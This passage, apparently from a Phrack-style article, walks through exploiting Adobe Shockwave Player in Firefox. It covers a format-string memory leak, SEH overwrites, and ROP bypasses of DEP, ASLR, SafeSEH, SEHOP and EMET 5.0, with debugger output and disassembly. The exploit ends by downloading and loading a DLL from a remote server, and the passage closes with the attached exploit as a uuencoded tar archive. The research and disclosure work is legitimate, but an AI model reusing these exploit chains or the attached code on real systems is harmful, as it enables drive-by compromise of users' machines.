function. In a few cases I saw some very interesting output, such as the
following:


 model("d03e682631e7c647ae08432631e18680fb8a9d03e6830680276b012d450d03e686
 9080b8e56b7420100c17eb9069056cd56908db3811038")


That was certainly not the name I gave that object when I called
newModel()...

Separating those %x values by spaces yielded:


 model("d03e68 6317e44 5ffad60 43 6317dcc 680fb8a9 d03e68 42 680276b0
 12d450 d03e68 69080b00 5711164 100c 17eb90 69056cd5 6908db38 1 1038")


At this point I was testing all of this on Windows XP and thus there was no
Address Space Layout Randomization to worry about. With that in mind, I'll
tell you that DIRAPI.dll has a preferred base address of 0x68000000 and
IML32.dll of 0x69000000. Looking at the output from the trace() call we can
clearly see that we're dealing with a format string vulnerability and for
each %x we provide, we're returned a 32-bit value off the stack.

As the code path to reach this vulnerability is deterministic, it can be
verified that the code pointers will always be the same on a non-ASLR'd
system. Thus, we can disclose the base addresses of at least two modules as
well as what look to be heap and stack pointers. We can verify the
addresses in a debugger:


0:008> !address 0xd03e68
    00c60000 : 00c60000 - 00101000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !heap -p -a 0xd03e68
    address 00d03e68 found in
    _HEAP @ 150000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        00c60018 20000 0000  [0b]   00c60020   100000 - (busy VirtualAlloc)
          ? <Unloaded_ame.dll>+ffff7
0:008> !address 6317e44
    06010000 : 06314000 - 0005b000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !address 5ffad60
    05f00000 : 05f00000 - 00101000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !address 12d450
    00030000 : 0011e000 - 00012000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageStack
                    Pid.Tid  d1c.89c
0:008> !address 69080b00
    69000000 : 69001000 - 0008c000
                    Type     01000000 MEM_IMAGE
                    Protect  00000020 PAGE_EXECUTE_READ
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageImage
                    FullPath <snip>IML32.dll
0:008> ub 69056cd5 L1
IML32!Ordinal1754+0x12b3:
69056cd3 ffd5            call    ebp


One thing worth pointing out there is that the heap pointers originate from
an allocation of size 0x100000. This is due to the Smartheap slicing out
allocations from its own arena of that size.

Anyway, the take-away here is that I was able to leak an address from the
stack, two from the heap, and one from a module (IML32.dll).


------[ 3.3.1 - Undocumented Format Specifier

During my initial attempt at exploitation of these issues, I was having
trouble locating a reliable stack pivot within the one module I was able to
leak an address from (IML32.dll). After struggling with that problem for
about one week, I went back and began reverse engineering the root cause of
the memory disclosure and came across some undocumented functionality in
Lingo.

When provided with a "%v" format specifier, the code within DIRAPI.dll
replaces it with <%d %p>:


(DIRAPI.dll: base address 0x68000000,
md5sum fb5405cef8b2d6273c593477392cbc88, checksum 1c266b,
Shockwave version 12.0.0.112)

.text:68039FF2  case__v:
.text:68039FF2
.text:68039FF2    add     edi, 4          ; jumptable 68039EC7 case 35
.text:68039FF5    mov     [ebp+var_814], edi
.text:68039FFB    mov     edi, [edi]
.text:68039FFD    lea     esi, [ebp+var_810]
.text:6803A003    mov     byte ptr [ebp+var_404], 0
.text:6803A00A    call    sub_68039CA0
.text:6803A00F    test    eax, eax
.text:6803A011    jz      loc_6803A0EA
.text:6803A017    mov     eax, [ebp+arg_8]
.text:6803A01A    mov     ecx, [ebp+var_824]
.text:6803A020    mov     edx, [ebp+var_828]
.text:6803A026    push    eax
.text:6803A027    push    ecx
.text:6803A028    push    edi
.text:6803A029    push    edx
.text:6803A02A    call    sub_68030DB0    ; replaces %v with <%d %p> and
.text:6803A02A                            ; re-enters this func


By placing %v characters at specific locations in the input string I was
able to force a dereference of one of the stack values and retrieve two
32-bit integers from there, which yielded me an additional address within
a module. Specifically, I was able to leak an address within the
"Shockwave 3d Asset.x32" module which, it turned out, had a quite useful
code primitive I abused for a stack pivot.


--[ 4 - Exploit Delivery

The exploits discussed herein were progressively developed, with differing
approaches as obstacles were encountered. I've included explanations of all
of them to allow the reader to gain some insight into the process rather
than just delivering an explanation of what came to be the best solution.
In fact, the attached exploit code has not been "cleaned up", instead it
contains all the artifacts of a work-in-progress leading up to the final
solution.


----[ 4.1 - Server-side Architecture

As some of the exploits have different required architecture, I will cover
all the components I utilized throughout the exploitation process.


------[ 4.1.1 - web.py

I used web.py[14] to serve the following:

  * HTML pages that embedded the .dir files
  * Director files
  * A payload in one of the exploits

The included exploit has the following directory structure:


./
  |   craft_exploit.py
  |   main.py
  |
  |---web
  |       (web.py library code)
  |
  '---www
      |---dirs
      |       input.dir
      |       mem_disc.dir
      |       output.dir
      |
      |---html
      |       exploit.html
      |       index.html
      |
      '---payload
              runcalc.dll


It is also worth noting that I added code to handle serving gzip-encoded
data to my main.py as I encountered some unreliability with regard to
web.py and its serving of large files.


------[ 4.1.2 - lighttpd

During one stage of the exploit development process, the code required a
WebDAV server to host a payload. For that, I used lighttpd[15] with the
following configuration:


        server.document-root = "/htdocs"
        server.port = 80
        server.username = "nobody"
        server.groupname = "nogroup"

        mimetype.assign = (".html" => "text/html",
                          ".application" => "application/x-ms-application")

        server.modules   = ( "mod_webdav",
                             "mod_alias",
                             "mod_accesslog")

        server.errorlog = "/logs/error.log"
        accesslog.filename = "/logs/access.log"

        webdav.activate = "enable"
        webdav.sqlite-db-name = "/lock/lighttpd.webdav_lock.db"



----[ 4.2 - The HTML

The HTML is pretty basic and consists of an index.html that embeds the .dir
file responsible for memory disclosure and an iframe that is dynamically
populated with the exploit.html page, which in turn embeds the crafted .dir
exploit for that particular client, on demand.

The iframe was required as it was noted that if one was not used, modules
in memory were loaded and unloaded at potentially different addresses if
the browser navigated away from one page, thus rendering the memory
disclosure unreliable.


----[ 4.3 - The Javascript

The index.html page contains the JavaScript functions responsible for the
following:

  * Receiving disclosed memory contents provided by the mem_disc.dir file
  * Receiving and parsing version, platform, and user agent information
  * POST-ing to itself in order to get such data back to main.py


----[ 4.4 - The Lingo

There are a couple of Lingo functions and properties that are exceptionally
friendly for the exploit developer. The following are used to determine how
to craft the malicious .dir file for a given client and then transport that
information to the server:

  * goToNetPage - function used to call JavaScript from the .dir
  * environmentPropList - property used to obtain platform, operating
    system information, and Shockwave build version


----[ 4.5 - The Python

The craft_exploit.py handles construction of a custom .dir file per client
request. It receives leaked memory addresses, browser user agent, Shockwave
version, and platform information from the aforementioned POST request.

The CraftExploit class defined within contains two class variables of note.
The self.int_mods list is populated with tuples containing the file offset
within the template .dir file and the value to inject. For example, the
first stack pivot used corresponds to offset 0x55AFC in the file. The
relevant code that replaces that value in the template .dir file looks like
this:


self.int_mods.append((0x55AFC, self.sw_3d+0x13e522))


The above will cause the resulting .dir file to contain, at offset 0x55AFC,
a pointer to offset 0x13e522 within the "Shockwave 3d Asset.x32" module.

The other notable class variable is self.str_mods which does much the same
thing, except that it is implemented as a dictionary. For example, in order
to ensure that a string value will exist at a given offset in the resulting
.dir file, one can utilize str_mods like so:


self.str_mods[0x536D0] = 'urlmon.dll\x00'


The contents of str_mods and int_mods are injected into the file using
CraftExploit's render method and then served to the target client via the
web server.


--[ 5 - Vulnerability Exploitation

The following sections will walk the reader through my exploit development
process against various configurations, bypassing mitigations as
encountered.


----[ 5.1 - Windows XP SP3/Firefox/Shockwave 11.6.5.635

This was the first exploit I wrote for this issue, and as I was developing
it on Windows XP SP3 I did not need to worry about ASLR (or even use the
memory disclosure vulnerability). This was written the day the bug was
discovered with the intent of exploiting the issue quickly, not reliably.

As the vulnerable code is protected by /GS, I opted to overwrite one of the
saved exception handlers on the stack. The executable was also compiled
with SafeSEH, bypasses for which have been covered extensively by others. In
short, I pointed the corrupted handler to an address inside a module that
did not make available the addresses of its exception handling functions
(for WinDBG users, I recommend checking out the narly[16] plugin that helps
determine which addresses are available for such a bypass). Thus, the
exception dispatcher was unable to determine if my corrupted pointer was
legitimate and would proceed to call it.

I then gained stack control and, after some ROP-ing, VirtualProtectEx'd the
stack and returned to it, executing a payload that simply ran
WinExec("calc.exe").

I relied on several things that make this exploit... dirty:

  * The modules I used to ROP with were getting their preferred base
  addresses, and thus I could easily ignore ASLR.
  * I used a system library, shell32.dll, for some primitives. This module
  is updated by Microsoft often and is not something to rely on.

So, to summarize, this exploit bypasses /GS, SafeSEH, DEP, and ignores ASLR
(but is more of a PoC than a proper exploit--and well, it's XP).


----[ 5.2 - Windows XP SP3/Firefox/Shockwave 11.6.8.638

About a day after I wrote the exploit for version 11.6.5.635 Adobe released
11.6.8.638. For completeness' sake, I added support to my exploit for what
was the latest version, using identical primitives, differing just in
location. See the attached exploit for details.


----[ 5.3 - Windows 7 x64/Firefox/Shockwave 12.0.0.112

When Adobe released version 12.0.0.112, I decided to utilize the memory
disclosure bug and exploit the vulnerabilities on a more modern operating
system, Windows 7.

This time, I used the stack memory disclosure to remove any reliance on
indeterminable memory addresses, thus bypassing ASLR. Unlike the prior
exploits, this version simply ROPs to a LoadLibraryA call and requests a
DLL over a UNC path. I created a simple DLL that just calls
WinExec("calc.exe") upon load. Then, using lighttpd as described in 4.1.2,
the file is served.


----[ 5.4 - Windows 7 x64/Firefox/Shockwave 12.0.0.112/EMET 5.0

The above exploit against Windows 7 x64 uses LoadLibraryA to load a
malicious payload off of a UNC share. EMET removes the ability to do this,
but it is easy enough to bypass, as detailed in the following section.


------[ 5.4.1 - Relevant 'EMET 5.0' Mitigations

The exploit for the same target with EMET 5.0 enabled simply calls
MoveFileA first to move the file from the remote WebDAV to the local
filesystem and then calls LoadLibraryA on the local file.

Protip: chattr +i the DLL file on the server so that the MoveFileA will
move it but won't be able to delete it afterwards, enabling subsequent
exploit attempts to work without a problem. You could also do this within
the lighttpd config.

Also, EMET implements a mitigation they call Export Address Table
Filtering[17] which monitors for read accesses to the exported function
addresses in key system DLL modules. However, the attached exploit
retrieves the addresses of functions by snagging a pointer via the
Shockwave modules' import section (which is not monitored by EMET), rather
than from the system DLL files themselves.


----[ 5.5 - Windows 8 x64/Firefox/Shockwave 12.0.0.112/EMET 5.0

Windows 8 introduces a number of exploit mitigations, thoroughly summarized
by Matt Miller and Ken Johnson during their Blackhat talk in 2012 [18]. The
most obtrusive mitigation that had to be overcome was SEHOP. SEHOP is
another mitigation intended to deter exploitation of SEH-based corruption.
As Microsoft describes [19]:

"The first step involves the insertion of a symbolic exception registration
record as the tail record in a thread's exception handler list. This step
occurs when a thread first begins executing in user mode. Since exception
registration records are always inserted at the head of the exception
handler list, the symbolic record is guaranteed to be the final exception
registration record.

The second step consists of walking the exception handler list at the time
that an exception is being dispatched to ensure that the symbolic record
can be reached and that it is valid. This step happens when the exception
dispatcher is notified that an exception has occurred in user mode. If the
symbolic record cannot be reached, the exception dispatcher can assume that
the exception handler list is corrupt and that an SEH overwrite may have
occurred. The exception dispatcher is then able to safely terminate the
process. If the symbolic record is found, the exception dispatcher is able
to proceed as it normally would and call each of the registered exception
handlers."

In order to bypass this mitigation, you pretty much need a memory
disclosure.  Luckily for me, the leaking of a stack address makes this
possible.

To demonstrate how such a mitigation is bypassed, the following will walk
through inspecting the exception chain before and after the exploit
corrupts it.

Firstly, once attached to the Firefox process, we can tell WinDBG to follow
child processes with the '.childdbg 1' command. Next we point Firefox to
the malicious server which will cause the Shockwave player to be invoked,
thus launching the plugin-container.exe process from Firefox:


0:029> .childdbg 1
Processes created by the current process will be debugged
0:029> g
ModLoad: 70b30000 70b63000   C:\Windows\SysWOW64\shdocvw.dll
<snip>
ModLoad: 09c70000 09c76000   plugin-container.exe
Executable search path is:
ModLoad: 00fa0000 00fa6000   plugin-container.exe
ModLoad: 772f0000 77447000   ntdll.dll
ModLoad: 76620000 76750000   C:\Windows\SysWOW64\KERNEL32.DLL
ModLoad: 74f10000 74fb6000   C:\Windows\SysWOW64\KERNELBASE.dll
<snip>
ModLoad: 74980000 74989000   C:\Windows\SysWOW64\CRYPTBASE.dll
ModLoad: 74920000 74971000   C:\Windows\SysWOW64\bcryptPrimitives.dll
(834.950): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000003 ecx=a1500000 edx=00000000 esi=00000000
edi=007e0000
eip=77390545 esp=007bf854 ebp=007bf880 iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
77390545 cc              int     3


In order to inspect the untainted exception chain, we can ask WinDBG to
next break upon loading of the Dynamiks.x32 module using:


1:032> sxe ld:dynamiks
1:032> g
(740.1f0): Unknown exception - code 000006ba (first chance)
ModLoad: 709e0000 70c81000   C:\Users\user\AppData\LocalLow\Adobe\Shockwave
Player 12\xtras\download\AdobeSystemsIncorporated\Dynamiks\Dynamiks.x32
eax=00000000 ebx=00800000 ecx=00000000 edx=00000000 esi=00000000
edi=fe9bf000
eip=77e20fe8 esp=0061a944 ebp=0061a99c iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00200206
ntdll!ZwMapViewOfSection+0xc:
77e20fe8 c22800          ret     28h
1:032> bp !Dynamiks+0x335b
1:032> g
Breakpoint 0 hit
eax=0506ba80 ebx=00000000 ecx=0061ca6c edx=71407620 esi=050003a0
edi=0061ca64
eip=709e335b esp=0061c074 ebp=0061c938 iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
Dynamiks+0x335b:
709e335b ff5244        call  dword ptr [edx+44h]  ds:002b:71407664=713debe0


We can view the current exception chain with the !exchain command:


1:032> !exchain
0061ef40: USER32!_except_handler4+0 (775f3991)
0061efa4: USER32!_except_handler4+0 (775f3991)
0061f000: ntdll!KiUserCallbackExceptionHandler+0 (77e22e60)
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff


For those unfamiliar with the above formatted information, the first number
is the address on the stack of the SEH record. For example, for the first
entry we can inspect the record and verify that the first 32 bit value
points to the next SEH record address on the stack, and that the second 32
bit value points to the code responsible for handling the exception:


1:032> dd 0061ef40 L2
0061ef40  0061efa4 775f3991
1:032> u poi(0061ef40+4) L4
USER32!_except_handler4:
775f3991 8bff            mov     edi,edi
775f3993 55              push    ebp
775f3994 8bec            mov     ebp,esp
775f3996 83ec14          sub     esp,14h


Prior to corruption, the SEH record chain consists of the following stack
locations, terminated by -1:


0061ef40->0061efa4->0061f000->0061f0fc->0061f858->0061f8a8->0061f8c8->
ffffffff


At this point, we also know the address of the destination buffer that will
be overflowed (see section 3.2):


1:032> dd @esp+0x8 L1
0061c07c  0061c534


We can calculate how much data is required to be copied from that address
to reach the first SEH record on the stack:


1:032> ? 0061ef40-0061c534
Evaluate expression: 10764 = 00002a0c


Now comes the fun part. The exception chain validation that occurs when
ntdll!KiUserExceptionDispatcher runs doesn't care how many entries are in
the chain. What this means is that an attacker has some flexibility with
regard to how they choose to bypass the checks. For example, the stack
corruption could be used to link the first exception handler
(USER32!_except_handler4) all the way to the last one
(ntdll!FinalExceptionHandler) by modifying the first's *next pointer.
Another option (and the one that I chose) is to craft a fake SEH record,
link a prior record to yours, and link yours to an existing one located
further down the stack. To illustrate this, the below shows the state of
the exception chain after attempting to step over the call that causes the
stack-based buffer overflow:


1:032> p
(740.1f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=0061c534 ecx=00000000 edx=00e5eff4 esi=00002af8
edi=0061ca6c
eip=71439d0a esp=0061c010 ebp=0061c010 iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00010206
IML32!Ordinal1115+0xa:
71439d0a 81780454534146 cmp dword ptr [eax+4],46415354h ds:002b:3773423a=??
1:032> !exchain
0061ef40: Shockwave_3d_Asset!CIFXString::SetCodePage+49122 (70f2e522)
0061ef50: 41414141
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff


Note that now the SEH chain consists of:


0061ef40->0061ef50->0061f0fc->0061f858->0061f8a8->0061f8c8->ffffffff


What has occurred is that the first SEH record has been corrupted to point
into the "Shockwave 3d Asset.x32" module (this is our stack pivot--more on
this later) and its *next pointer has been modified to point to a new
address on the stack (calculated using the stack memory disclosure).

The second record shown above is a fake one that my exploit crafts to
re-link the chain. Its *next pointer has been crafted to point to 0061f0fc
which is a valid SEH record that existed prior to the corruption. Note that
its code pointer was simply set to 0x41414141, which is weakly validated by
ntdll's exception dispatcher to ensure it is not located on the stack.

At this stage, the SEH chain will pass SEHOP validation and the first
record's code will be called. This can be verified in the debugger:


1:032> bp Shockwave_3d_Asset!CIFXString::SetCodePage+49122
1:032> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=70f2e522 edx=77e23105 esi=00000000
edi=00000000
eip=70f2e522 esp=0061ba5c ebp=0061ba7c iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
Shockwave_3d_Asset!CIFXString::SetCodePage+0x49122:
70f2e522 8b4d0c     mov   ecx,dword ptr [ebp+0Ch] ss:002b:0061ba88=0061ef40



------[ 5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations

EMET 5.0 implements many mitigations that were submitted as 'defensive
security research' to the Microsoft BlueHat Prize Contest (over $250,000
was awarded). The software is still in Tech Preview, but I was curious as
to how difficult it would be to bypass. I was also a bit irked that my
prior exploits required a WebDAV server. So, in this version of the exploit
I decided to remove that requirement. This was accomplished by ROP-ing a
call to LoadLibraryA whereby I loaded the urlmon.dll module. More
specifically, I returned to LoadLibraryA+0x5 to skip over the EMET hook:


1:039> u KERNEL32!LoadLibraryA L2
KERNEL32!LoadLibraryA:
76ccf864 e92f0932f9      jmp     6fff0198
76ccf869 837d0800        cmp     dword ptr [ebp+8],0

1:039> u 6fff0198
6fff0198 684bedeeeb      push    0EBEEED4Bh
6fff019d 60              pushad
6fff019e 9c              pushfd
6fff019f 54              push    esp
6fff01a0 e80bd32a05      call    emet+0x4d4b0 (7529d4b0)
6fff01a5 9d              popfd
6fff01a6 61              popad
6fff01a7 83c404          add     esp,4


By ensuring we land at LoadLibraryA+0x5 and we control @ebp, this EMET hook
is trivially bypassed. Microsoft is aware of how limited this hook is, and
they even cite Phrack in their blog post[20].

Once urlmon.dll was loaded, I had to deal with EMET's 'Caller' mitigation,
which does the following:

"EMET will make sure that when a critical function is reached, it is
reached via a "call" instruction rather than a "ret" instruction. This is a
very useful mitigation and breaks many ROP gadgets."[20]

I also had to deal with the 'SimExecFlow' mitigation:

"This mitigation tries to detect ROP gadgets following a call to a critical
function. It works by emulating a specified number of instructions at the
return address of the caller of a critical function."[20]

Both of the above mitigations would interfere with my calling
GetProcAddress to retrieve the address of URLDownloadToFileA. They were
bypassed by returning into the middle of a module's existing call to
GetProcAddress, thus EMET could not tell that it was ROP-ed to or that it
was an illegitimate call:


.text:7A25CD4A 00C                 push    eax             ; hModule
.text:7A25CD4B 010                 call    ds:GetProcAddress
.text:7A25CD51 008                 mov     [esi+18h], eax
.text:7A25CD54 008                 cmp     eax, edi
.text:7A25CD56 008                 jnz     short loc_7A25CD6D
.text:7A25CD6D     loc_7A25CD6D:
.text:7A25CD6D
.text:7A25CD6D 008                 mov     eax, edi
.text:7A25CD6F 008                 pop     edi
.text:7A25CD70 004                 pop     esi
.text:7A25CD71 000                 retn
.text:7A25CD71     sub_7A25CD20    endp


By returning directly to the code at 0x7A25CD4A, @eax already contained the
result from LoadLibraryA("urlmon.dll\x00"), and because I could predict
stack addresses using the memory leak it was easy enough to ensure there
was a pointer to the string "URLDownloadToFileA\x00" for the call to
GetProcAddress and also that @esi was pointing to a stack address under
control. Thus, I was able to get the address of the function without a
problem.

Then, I called URLDownloadToFileA to drop the payload to a default writable
local directory (C:\Users\Public) and then returned to LoadLibraryA and
loaded the code.


--[ 6 - Future Work

I began developing support for process continuation/continuation of
execution/whatever it's being called these days. It should be fairly easy
to ensure the plugin-container.exe doesn't crash hard, but would require
reversing the interaction between this process and the firefox.exe parent.


--[ 7 - Conclusion

This article wasn't intended to share anything novel... any competent
exploit writer could have implemented the attached exploit. I just wanted
to share a walkthrough from bug discovery to reliable exploit so that
readers can get a feel for what the process is like these days.


--[ 8 - Greets

Thanks to navs, sohlow, raid, & hoodlum for their insight and valuable
discussions.


--[ 9 - References

[1] http://community.corest.com/~gera/InsecureProgramming
[2] http://virus.wikia.com/wiki/29A
[3] http://www.uninformed.org
[4] http://helpx.adobe.com/shockwave/kb/shockwave-player-faq.html
[5] http://www.adobe.com/products/shockwaveplayer.html
[6] https://wiki.mozilla.org/NPAPI
[7] http://www.adobe.com/products/director.html
[8] http://cansecwest.com/csw11/Adobe_Shockwave-AaronPortnoy
    _LoganBrown.pptx
[9] http://www.microquill.com/smartheap/index.html
[10] http://www.j4u2.com/jht/bio.html
[11] http://helpx.adobe.com/director/topics/scripting-dictionary.html
[12] http://msdn.microsoft.com/en-us/library/8dbf701c(v=vs.80).aspx
[13] http://uninformed.org/index.cgi?v=7&a=2&p=5
[14] http://webpy.org/
[15] http://www.lighttpd.net/
[16] https://code.google.com/p/narly/
[17] http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-
     exploitation-of-seh-overwrites-with-sehop.aspx
[18] http://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller
     _Exploit_Mitigation_Slides.pdf
[19] http://blogs.technet.com/b/srd/archive/2010/07/28/announcing-the-
     upcoming-release-of-emet-v2.aspx
[20] http://blogs.technet.com/b/srd/archive/2012/07/24/emet-3-5-tech-
     preview-leverages-security-mitigations-from-the-bluehat-prize.aspx


--[ 10 - Exploit

begin 644 exploit.tar.bz2
M>^?F'_WN*>B2?@CZA5*_<-"#[93PZ@-J1(="D8J3*GH,'X3&=[-Q(32=6L6V
MVZ)+%(EIGR#IT;VK$B^_K2IHE96ZTJ:EA?ALW=9F*VR2O8ZUF;5J]KB:UNY;
M<:*5V-3P^>:-IC$[/YNMAS8X4QT?Y].#RLQ$DZQ4\KNIB?%/XI]<:AM7IDJ?
MJXG<>6TQ*_Y!4GB#(YLCW6S\&DCTZ>B?/N;;U+S(TTJ*A_P56/]T_DIN.O[I
MD9,1B/%/^MB/8?6/]S_.G\F>4Y,1=/H4B):8>QC7!L&J;A*!!\*%!!`4'<8K
M"71!#<X:"XU'IIQ>/7!5%HYA("$S`?D>J+STU9A@K&8LA$KO2>K[*P/%+Z"X
MMWDK>;7TV3X/GM%`AI8@@^296SQG!LN&VB>OP4I0"@WP1J4B0]G333$M1:GG
MZ0Y(JM/A%9*TF>OQGLV)OFY&'#:;\_C9I5;FH:<-,8T-:UFW,X5C6I):./FV
M#\A9(G)+(B>D[O?O@\#ISJ[UWQY5N-^'N\=21)5"="R(D=]+)(8[C9BN]N0C
M7=<*F-]]GJN>W,#FJN:N[-(C%:8PYU(QM*UH&6(DDY!20Z5D3\S_-@&E*I5@
MJHJE*+*GRUF*_;'E+]>GY"?8?B<DA)_Q?!,1^Y?E&$G^=[U[)I#_^>W8AR6)
M(VJ#H?ZG@8TB<GP#__/W:L24$E0,J1J)&F(W^N.>.H4*4^XA4"%+;!,3Z%C4
M^B3C/HE"3%&A3'@$A(0NB22)G2<>`3RJ.U<LZ%0)KI&Z(GM%0G%B0N725U=@
MM"-/J5"5*@3J:]=8%0A4RTJ(G4%0EI2:<VE)Y&A2'E.RQYYPY.H1.M]_B8BI
M!72KOL5Z[-Q/6MJ]<K%-JR<L<.'"L>'KW/)RX):D]I8(8J0D?'O+8C2R23A7
M-C#JHK:;,8I5=6)BMC28G'&KM)VUD)/66))#A4*H(<S$F45C&*PQPYFF&&&.
M;2JJN.(4*D1U%0)T%('-4D0VEDG-AR4U6C"JV;8116V-'-N)-TD.A^(^C/R6
M']`_O)_&?LG_F_41_C=9))V%($[2L=M];F*5W7=<(P<E9MIB56)M54*JIC!C
M;4^(3:>U:)G/()ZM^P3(BO\*,%?FD_I/]#S3@@.A4D#L,5D,5*[33K5BM*;8
M:56VW:8-*J5PX"R"*I(AI6*G"L*5M5.&CAMPKAC;39MI*,<-J4TV2?`/^"8K
M[=&*_TD^A:?J'\EB0_Z7Y3XX[C<(B=Q+VEAVG<:8K&HA58ILQ5::=QPTQC%5
MBM,;81\FGLDR)/UAY]3Y!^W-R)).M42JD2*ZF.DQB8PIU-.MPVE5*G#39MIP
MK;&FE@VD2.%22)5B1,8K)!C2L#'!4IIBMMI&C'"JU"2,5$D;41,5)6*;:B5H
MQ6*X852G#&FFS;&/A'ZC"(G"D23FIBL54YM-,.3;#&*5BJTTK;$R)-A4$-*2
M2-J2:5&F-JIC%:4;,::,4V:8YM'#'`B)PHJIMALQIPT*8VQM%<,.&,.(D0VJ
M*J(G#AD8Q4JMJG"M*II."N&F,<+)P%3^54DB-JD-.2D8KDK&,8V5I3;;DV<-
MJTHQ32F_=\H@,5)).%D255<&C0T4QC3AM6-JQI54VTQ6I$@VI(55;8Q54IC!
MH5MIHQ5<C3#'`<)$3:H254DG"G#3#:56*Q6*S396,8FF*VX:8Q.$B)M4$JDK
M;9LT;*K:<%:5A5532J$1PHC:JJJ/./KSAS<%5PD2JKDK31IS5P85CAMC;&*3
M22?[U)_??^:-B2-*DD57"E,*K&,8PKD<TK16V-.@PJN#Z]\<S'F,$B<U05PE
M<G-BMMM*Q70VJN'#%8I6&-/Z!X$G]Q^@]:CJ2!S4DJD5415.T_2<VW2ZG6TT
MKFQV"JHX56SAC%;8;.$D3%1*H"M*VX-,;8JF%5CA6FDK;&@AM42<*2J5PQ6C
M%88VVT:-M-IA6-22$X5$VJ2-JC>G#%*5I6C&FU:56DT:56.%`<*!HQ557#2F
ME88<-*VVQI7"FU;0%4BJB8JJVHX,:;-JQBFDTFV--,;<-J;:3[I4')9!*LB3
MD;:<C"L:<C;#@TK$;56V-*TPB3%2&BI5<#9P<*K:JX:5PT5BJK'"A*J(G"FF
MV-)LK:E<&-JVTJME<%;8Q7!%4DDTI'!PR,,5IIPQ6V*X<*I55MP;-%,B$VH%
M<-,::,*V;3;9M58T-E5PQHD2JAM6*2*X:5AHTT<-FVV#:<)BM-;/"*A)PVQC
M:5R:;:,:::<E<,8QPKAHJM,;81IMA),4APK1HX8;4K3%5MPJJKAMC&CA4?)*
MDB85.1,<DT8QBJ<&FE<FVV&21&U(JM*E5PK3AIB5C32L,8IM6,<#$/N52)II
M@8J-M,1IR.2JX,5*Q2M)6C&.$TX;:<)^,]`_-<DVI52150KDK',H8K%4:.@V
M;8TQA6W0VK3LO\#"&U#:Q,4Y-,.92N:*X<*G#3&*JJ56/6CV9/U1/Y;\QZ-U
MAT*ZU'4J08K'4TE5*JL=;96.%*VX8JJK@=:H.2J5MPJJ456F*PY)5')*JMN!
M'#;$85.#958JJ-'#&-M%*FVV-MMHX4JDTL0X5M1CAIAC;2M,<*V;-,5PJOOE
M0VJ&F,;4X.2E2;5C;%<*JE5C&*QS<CP*0TX,1*IR5551S--L;:8YL;:8F,,<
M."JI,;8@VVVJE8VVI58Q6W#3;;:J<*JMI*LD;456AAA6E8K:-#:L5C&-IBIM
M858Q4VQC33%,8JMM-MJX;8PQIIBFC&,8<&E1,*KA-*VQ7"L-M**II2M.&EDX
M4;4P<.%5PTK3%<&-JX5C:JTK;?2?:NT<D;6"HKFQT.AT-M.&S'"L;5PQPG"N
M#AICAPX(TVQ--,0X-L::5C%8VE,<-&FG"L;5U&OP"R<*X43DT'-CFQ,8IC%8
MQPJIC;'N'4<T:57)A#A7)C%<-.:JY*Y-,5,4IAI&.2&U4J8K:J4IR-C8W&FS
M3A7#AILPX5#A6V--JJJ<*TJJPQIC3ABJK&W#ALG"MF,*<&U,4JIIBJ;:8TTG
M#;#3:I_ZJ8II28<APYJFG#2M*YMJPKAB;<FFS::3A_RF)&-,57"N2J5LQ*:;
M8QR8VQ6RM-*VX0X452'"E-*JE4QLTV8IMHQI6G#;;@<)4A7#&V%*JIMM*X,5
M333;3;%2L.*I,5#AIHX5HQ1HPJM--,<&E&FW?Y)&DI.Y7WRCH4Z%*K&)6%8F
M*YNA55MCFC33AC;AH.%23%1P:5IIBL53@PKA7"JQ6FG#9L4ILHHTX8,:8TE5
MBJQPFBN'#AM7#'#AH.%%55.'#&C!58T5PX<-JK2DQL[;TK)(X4VH<RL4K&BI
MC3FVK3&W-A6E8VPQQB>.PX55*<F,,8I3ABC@;:<D<$-%:5BMM-*TJJ8VVX-N
M&FFU5&.&Y*X8-*BJQIBL8ICAPVX;52ML5AM5?@N-)5)3PC#PW_?C9%=#%.EC
M%5B-.DJICI<.#A5:5-$TKAIC14K@VQIHJJT.'#3&S3ALVTIHTCX!A,*GL4I^
M>K[MZ]_H5Z]S1P4%5.M2L,=;'8;56*TF--M--L8QB8KL/#>S>H?\[2=Q.DZ%
M)54Z54QC'2ZFE56C"JZC96E<-N;XUP[#]P/NR?KR=#A4KH5B?6,::88[#'88
